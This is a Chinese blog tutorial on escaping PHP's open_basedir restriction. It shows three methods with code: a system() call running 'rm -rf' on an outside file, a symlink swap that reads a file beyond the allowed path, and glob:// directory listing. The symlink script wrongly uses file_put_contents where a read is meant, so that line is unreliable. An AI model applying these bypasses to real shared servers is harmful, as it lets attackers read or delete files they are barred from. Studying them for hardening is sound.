PHP绕过open_basedir限制操作文件的方法


Posted in PHP onJune 10, 2018

0x00 预备知识

关于open_basedir

open_basedir是php.ini中的一个配置选项

它可将用户访问文件的活动范围限制在指定的区域,

假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。

注意用open_basedir指定的限制实际上是前缀,而不是目录名。

举例来说: 若"open_basedir = /dir/user", 那么目录 "/dir/user" 和 "/dir/user1"都是可以访问的。所以如果要将访问限制在仅为指定的目录,请用斜线结束路径名。

关于符号链接

符号链接又叫软链接,是一类特殊的文件,这个文件包含了另一个文件的路径名(绝对路径或者相对路径)。

路径可以是任意文件或目录,可以链接不同文件系统的文件。在对符号文件进行读或写操作的时候,系统会自动把该操作转换为对源文件的操作,但删除链接文件时,系统仅仅删除链接文件,而不删除源文件本身。

0x01 命令执行函数

由于open_basedir的设置对system等命令执行函数是无效的,所以我们可以使用命令执行函数来访问限制目录。

我们首先创建一个目录

/home/puret/test/

且在该目录下新建一个1.txt 内容为abc

nano 1.txt

再在该目录下创建一个目录命名为b

mkdir b

并且在该目录下创建一个1.php文件内容为

<?php
  echo file_get_contents("../1.txt");
?>

且在php.ini中设置好我们的open_basedir

open_basedir = /home/puret/test/b/

我们尝试执行1.php看看open_basedir是否会限制我们的访问

执行效果如图

PHP绕过open_basedir限制操作文件的方法

很明显我们无法直接读取open_basedir所规定以外的目录文件。

接下来我们用system函数尝试绕open_basedir的限制来删除1.txt

编辑1.php为

<?php
 system("rm -rf ../1.txt");
?>

先来看看执行1.php之前的文件情况

PHP绕过open_basedir限制操作文件的方法

执行1.php之后

PHP绕过open_basedir限制操作文件的方法

成功通过命令执行函数绕过open_basedir来删除文件。
由于命令执行函数一般都会被限制在disable_function当中,所以我们需要寻找其他的途径来绕过限制。

0x02 symlink()函数

我们先来了解一下symlink函数

bool symlink ( string $target , string $link )

symlink函数将建立一个指向target的名为link的符号链接,当然一般情况下这个target是受限于open_basedir的。
由于早期的symlink不支持windows,我的测试环境就放在Linux下了。

测试的PHP版本是5.3.0,其他的版本大家自测吧。

在Linux环境下我们可以通过symlink完成一些逻辑上的绕过导致可以跨目录操作文件。

我们首先在/var/www/html/1.php中 编辑1.php的内容为

<?php
  mkdir("c");
  chdir("c");
  mkdir("d");
  chdir("d");
  chdir("..");
  chdir("..");
  symlink("c/d","tmplink");
  symlink("tmplink/../../1.txt","exploit");
  unlink("tmplink");
  mkdir("tmplink");
  echo file_put_contents("http://127.0.0.1/exploit");
?>

接着在/var/www/中新建一个1.txt文件内容为

"abc"

再来设置一下我们的open_basedir

open_basedir = /var/www/html/

在html目录下编辑一个php脚本检验一下open_basedir

<?php
   file_get_contents("../1.txt");
?>

执行看下。

PHP绕过open_basedir限制操作文件的方法

意料之中,文件无法访问。

我们执行刚才写好的脚本,1.php

PHP绕过open_basedir限制操作文件的方法

可以看到成功读取到了1.txt的文件内容,逃脱了open_basedir的限制

问题的关键就在于

symlink("tmplink/../../1.txt","exploit");

此时tmplink还是一个符号链接文件,它指向的路径是c/d,因此exploit指向的路径就变成了

c/d/../../1.txt

由于这个路径在open_basedir的范围之内所以exploit成功建立了。

之后我们删除tmplink符号链接文件再新建一个同名为tmplink的文件夹,这时exploit所指向的路径为

tmplink/../../

PHP绕过open_basedir限制操作文件的方法

由于这时候tmplink变成了一个真实存在的文件夹所以tmplink/../../变成了1.txt所在的目录即/var/www/

然后再通过访问符号链接文件exploit即可直接读取到1.txt的文件内容

当然,针对symlink()只需要将它放入disable_function即可解决问题,所以我们需要寻求更多的方法。

0x03 glob伪协议

glob是php自5.3.0版本起开始生效的一个用来筛选目录的伪协议,由于它在筛选目录时是不受open_basedir的制约的,所以我们可以利用它来绕过限制,我们新建一个目录在/var/www/下命名为test

并且在/var/www/html/下新建t.php内容为

<?php
  $a = "glob:///var/www/test/*.txt";
  if ( $b = opendir($a) ) {
    while ( ($file = readdir($b)) !== false ) {
      echo "filename:".$file."\n";
    }
    closedir($b);
  }
?>

执行结果如图:

PHP绕过open_basedir限制操作文件的方法

成功躲过open_basedir的限制读取到了文件。

PHP 相关文章推荐
PHP下利用header()函数设置浏览器缓存的代码
Sep 01 PHP
PHP中去除换行解决办法小结(PHP_EOL)
Nov 27 PHP
PHP排序算法的复习和总结
Feb 15 PHP
php 常用算法和时间复杂度
Jul 01 PHP
php中apc缓存使用示例
Dec 25 PHP
php初始化对象和析构函数的简单实例
Mar 11 PHP
php计算几分钟前、几小时前、几天前的几个函数、类分享
Apr 09 PHP
thinkphp模板继承实例简述
Nov 26 PHP
UPUPW 更新 64 位 Apache 系列 PHP 7.0 正式版
Dec 08 PHP
详解WordPress中用于合成数组的wp_parse_args()函数
Dec 18 PHP
smarty高级特性之过滤器的使用方法
Dec 25 PHP
详解WordPress中创建和添加过滤器的相关PHP函数
Dec 29 PHP
PHPMailer ThinkPHP实现自动发送邮件功能
Jun 10 #PHP
PHP实现从PostgreSQL数据库检索数据分页显示及根据条件查找数据示例
Jun 09 #PHP
PHP实现二维数组中的查找算法小结
Jun 09 #PHP
PHP实现链表的定义与反转功能示例
Jun 09 #PHP
thinkPHP框架实现的无限回复评论功能示例
Jun 09 #PHP
ThinkPHP5框架实现简单的批量查询功能示例
Jun 07 #PHP
PHP 实现手机端APP支付宝支付功能
Jun 07 #PHP
You might like
PHP分页显示制作详细讲解
2008/11/19 PHP
php抽奖小程序的实现代码
2013/06/18 PHP
跟我学Laravel之路由
2014/10/15 PHP
Laravel5.4框架使用socialite实现github登录的方法
2019/03/20 PHP
JavaScript 学习小结(适合新手参考)
2009/07/30 Javascript
javascript奇异的arguments分析
2010/10/20 Javascript
jQuery实现页面滚动时层智能浮动定位实例探讨
2013/03/29 Javascript
js游戏人物上下左右跑步效果代码分享
2015/08/28 Javascript
整理JavaScript创建对象的八种方法
2015/11/03 Javascript
IE8 内存泄露(内存一直增长 )的原因及解决办法
2016/04/06 Javascript
微信小程序 Record API详解及实例代码
2016/09/30 Javascript
nodeJS删除文件方法示例
2016/12/25 NodeJs
原生js封装自定义滚动条
2017/03/24 Javascript
使用vue框架 Ajax获取数据列表并用BootStrap显示出来
2017/04/24 Javascript
JavaScript中的FileReader图片预览上传功能实现代码
2017/07/24 Javascript
Vue cli+mui 区域滚动的实例代码
2018/01/25 Javascript
axios的拦截请求与响应方法
2018/08/11 Javascript
Javascript数组方法reduce的妙用之处分享
2019/06/10 Javascript
JS使用setInterval计时器实现挑战10秒
2020/11/08 Javascript
python读写ini文件示例(python读写文件)
2014/03/25 Python
Python简单实现的代理服务器端口映射功能示例
2018/04/08 Python
python实现对指定字符串补足固定长度倍数截断输出的方法
2018/11/15 Python
python爬取指定微信公众号文章
2018/12/20 Python
python多进程读图提取特征存npy
2019/05/21 Python
QML用PathView实现轮播图
2020/06/03 Python
Python tempfile模块生成临时文件和临时目录
2020/09/30 Python
利用python+ffmpeg合并B站视频及格式转换的实例代码
2020/11/24 Python
纯CSS3实现圆圈动态发光特效动画的示例代码
2021/03/08 HTML / CSS
关于HTML5的安全问题开发人员需要牢记的
2012/06/21 HTML / CSS
localstorage和sessionstorage使用记录(推荐)
2017/05/23 HTML / CSS
电子商务毕业生求职信
2013/11/10 职场文书
团代会宣传工作方案
2014/05/08 职场文书
安全承诺书格式
2014/05/21 职场文书
中国梦演讲稿范文
2014/08/28 职场文书
教师节表彰会主持词
2015/07/06 职场文书
《攀登者》:“海拔8000米以上,你不能指望任何人”
2019/11/25 职场文书